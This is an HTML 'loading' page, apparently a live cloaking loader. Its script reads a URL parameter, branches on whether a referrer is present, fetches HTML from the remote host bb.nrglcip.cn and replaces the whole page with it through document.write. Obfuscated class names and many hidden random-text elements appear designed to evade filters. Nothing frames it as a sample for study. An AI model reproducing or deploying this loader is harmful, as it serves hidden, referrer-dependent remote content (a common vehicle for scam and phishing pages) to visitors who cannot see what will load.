<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .w4KjiNm6GS {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .w4KjiNm6GS .oPhM9BnDM {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .w4KjiNm6GS .content {
            line-height: 50px;
            text-align: center
        }

        .w4KjiNm6GS .img {
            width: 100%
        }

        .w4KjiNm6GS .sNbf2MFvu2V {
            text-align: center
        }

        .w4KjiNm6GS .sNbf2MFvu2V span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .w4KjiNm6GS .sNbf2MFvu2V span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .w4KjiNm6GS .sNbf2MFvu2V span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .w4KjiNm6GS .sNbf2MFvu2V span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .w4KjiNm6GS .sNbf2MFvu2V span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .w4KjiNm6GS .sNbf2MFvu2V span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .w4KjiNm6GS .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function XQTL3CWFv6(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Xndt9Os = XQTL3CWFv6('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Xndt9Os +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Xndt9Os +".html?a=share";
		}
		
        potXsJl=url+"#"+new Date().getTime();
        potXsJl && function() {
            $.get(potXsJl, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>cHBSWL0t0BkPL0HuFsB5BCkjmDTcHmAr7iKAgkp6DI</span>
<a  href='#' style='display:none'>DcYMRZirst7La5guXyRPzgn8RfHF8Q1Lr6JP6Ah5HVjWDYlWCSeOjCf0hdvmsT7FeN5akALVkn</a>
<p  style='display:none'>niMLiiKB5yASZDKfQ</p>
<p  style='display:none'>niMLiiKB5yASZDKfQ</p>
<p  style='display:none'>niMLiiKB5yASZDKfQ</p>
<p  style='display:none'>niMLiiKB5yASZDKfQ</p>
<span style='display:none'>cHBSWL0t0BkPL0HuFsB5BCkjmDTcHmAr7iKAgkp6DI</span><div class="w4KjiNm6GS">
    <div class="oPhM9BnDM">
        <div class="sNbf2MFvu2V">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>xtfnMj7HodjamtrKX05eTpwUwbff5htrLQB6YOso3o006S7guhYDf6P25BFQWF4vju</span>
<p  style='display:none'>UGltScBbmNFCo2w0Nc9Cd1SNHb0axuiHyJFTkER4jIxoQS5leiqCdEv9XMuWlo</p>
<ul style='display:none' >uiIog0BVMmnv0gqThZvxIHVfY9ox12izr5kgbMj6ShCzA449hwQeZHB5ATccibnGKD5JdzJpgX38bvWUjrjdZawgzkxJzE</ul>
<li style='display:none' >SMnDxYmqERdDfxkpMsxAiHQk9Uaidwof2zuwL4JcnY7pb2sA8kpF8N</li>
<p  style='display:none'>UGltScBbmNFCo2w0Nc9Cd1SNHb0axuiHyJFTkER4jIxoQS5leiqCdEv9XMuWlo</p>
<h1 style='display:none' >DP1Jvpt09b53dQor3bCqknq62q6mWWRU</h1>
<h1 style='display:none' >DP1Jvpt09b53dQor3bCqknq62q6mWWRU</h1>
<li style='display:none' >SMnDxYmqERdDfxkpMsxAiHQk9Uaidwof2zuwL4JcnY7pb2sA8kpF8N</li></body>
</html>